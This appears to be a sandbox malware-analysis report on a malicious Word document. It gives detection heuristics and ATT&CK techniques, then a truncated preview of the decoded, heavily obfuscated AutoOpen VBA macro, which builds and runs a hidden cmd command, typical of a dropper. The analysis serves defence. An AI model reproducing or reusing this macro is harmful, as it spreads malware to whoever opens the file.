Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, which runs automatically when the document is opened and is a common technique for executing malicious code. The macro attempts to execute a command using the Shell function, indicating that it is likely a downloader or dropper for a second-stage payload. The presence of the AutoOpen macro together with the critical ClamAV detection strongly suggests malicious intent.
Heuristics (5)
- ClamAV: Doc.Malware.Generic-6666973-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6666973-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12762 bytes |

SHA-256 of macros.bas: c4e9bd6a3c9933d80d57061c39aeed6fe5a842967e01ced1a8f2af9b21adcd09

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "VXzoOtZVpkqYRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Sgn(211519271)
TypeName 95
TypeName dwcBFA
TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk)
TypeName PrhbH
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
TypeName Oct(7415 + wBbjOc)
TypeName Hex(820)
End Sub
Attribute VB_Name = "HqzoUYE"
Function qkocjRXozk()
On Error Resume Next
TypeName 8
TypeName 5
TypeName CBool(uUwTP / BCNfj + IjllC * Jtdss)
pMjuPE = "md" + " /" + "V" + ":" + "ON" + "/" + "C" + CStr(Chr(HkvQaIqZq + jJuaHnM + 34 + OkbwZzio + optdlER)) + "s"
TypeName 952
TypeName 177591525
iDYaVqOhNV = "e" + "t #" + " " + " =" + "wjt" + "h" + "MMi" + "M"
TypeName Sqr(115314270)
TypeName Sqr(ciqCu)
jtChbj = "Ur" + "v" + "GUs" + "Cvw" + "HW" + "NTV" + "r" + "p=" + "/" + "xo" + "au-" + "b"
TypeName TFrDZY
TypeName Log(2157)
TypeName 72
YPNfmVUj = "lS9" + "P:)" + "(7" + "n" + "6y}"
TypeName 255
TypeName Atn(9305)
TypeName Rnd(MmikC)
sGYKrBwj = "B;e" + "Fz3" + "1," + "d" + "{Xk"
TypeName CLng(NEQiD)
TypeName Cos(86757 / Coilz)
TypeName Hex(81161 - mpTMsw / GsKWE * KZtrF)
ItdcqrhcmO = "gc" + "Y$D" + "m" + " '\" + "IKf"
TypeName qwOUw
TypeName CSng(MRbjP)
TypeName Oct(NIwAIq)
IMqDsNdUS = ".q" + "@E" + "+" + "R&" + "&fo" + "r " + "%p" + " in" + " ("
TypeName CBool(96112 - ZWZXr + 56737 / CMPwwB)
TypeName blzDiW
UsqaiVMp = "2" + "3," + "2" + "7,1" + "6," + "46," + "22," + "13" + ",3," + "4" + "6" + ",3"
TypeName Atn(67)
TypeName CStr(MktFL)
TypeName Rnd(8)
BKfcBXj = "2" + ",32" + ",62" + ",59" + ",2" + "3," + "6" + "6,4" + "8,2" + "4,4"
TypeName 7
TypeName 77
TypeName 17
tBfKuqqDVpC = "0," + "46" + "," + "16," + "3" + "0,2"
TypeName Chr(pRVWF / SpiZiZ)
TypeName TFQzX
TypeName mzsLz
zrCEtPV = "7" + ",31" + ",1" + ",4" + "6,5" + "7"
TypeName 54
TypeName Sqr(qjLKrw - jEkAnW - 38042 - iGwQl)
TypeName CSng(36877 - ADhIXl / 45669 + ZJapLv)
psNkbziiCi = "," + "2," + "62" + "," + "1" + "9" + ",46" + ",2," + "6" + "8" + ",18" + "," + "4"
TypeName CLng(VuYDvS + 48933 + FCXNT + MSJnO)
TypeName 66
TypeName CSng(460072517)
PnfWlL = "6," + "3" + "1," + "14" + "," + "3" + "2" + ",6" + ","
qkocjRXozk = pMjuPE + iDYaVqOhNV + jtChbj + YPNfmVUj + sGYKrBwj + ItdcqrhcmO + IMqDsNdUS + UsqaiVMp + BKfcBXj + tBfKuqqDVpC + zrCEtPV + psNkbziiCi + PnfWlL
TypeName Cos(19996 / tmOFZ * zIPjN - UNMpLc)
TypeName Rnd(PNNti)
TypeName 423450039
End Function
Function SrLJcKU()
On Error Resume Next
TypeName CStr(pChJp)
TypeName 1059
TypeName qmusd
vznVCcFb = "46," + "40," + "2," + "45," + "59," + "21," + "71"
TypeName Rnd(78)
TypeName Round(18040 * zMfzwu)
TypeName 9
HQuHjnR = ",67" + ",24" + ",6" + "3," + "3" + ",2," + "2," + "23" + ","
TypeName Round(971)
TypeName Sin(iGiYL / VYDrKH / 51611 - sblcjm)
ljZzjDHRc = "3" + "6,2" + "5,2" + "5" + ",28" + "," + "61"
TypeName Sqr(64405 / FfGwoF)
TypeName Round(ZTISvQ + HoJrkI)
JfrXu = ",46" + ",5" + "2,6" + ",27" + ",4"
TypeName APSOm
TypeName Rnd(201076278)
TypeName 525
JmKwkvO = "0," + "6" + "8" + ",4" + "0," + "4" + "6,2" + ",25" + ",29" + ",1" + "9"
TypeName Chr(117133175)
TypeName CByte(siCdmB / SRzIT + 28011 / sjFvsE)
NBHoJQOXV = "," + "7" + "," + "12" + "," + "49," + "34," + "44"
TypeName Cos(59)
TypeName cPaoa
wDAGGP = ",70" + "," + "3" + ",2," + "2," + "23" + ",3" + "6" + ",25"
TypeName 202309463
TypeName Sqr(YpNCC)
TypeName 1
jLcazYaNlpm = "," + "25," + "3" + "1" + "," + "6,5" + "7,"
TypeName kZjddf
TypeName CLng(KwzmUa)
TypeName CDbl(XbOsu)
RtUVbJWOdT = "6," + "57" + "," + "29," + "32,"
... (truncated)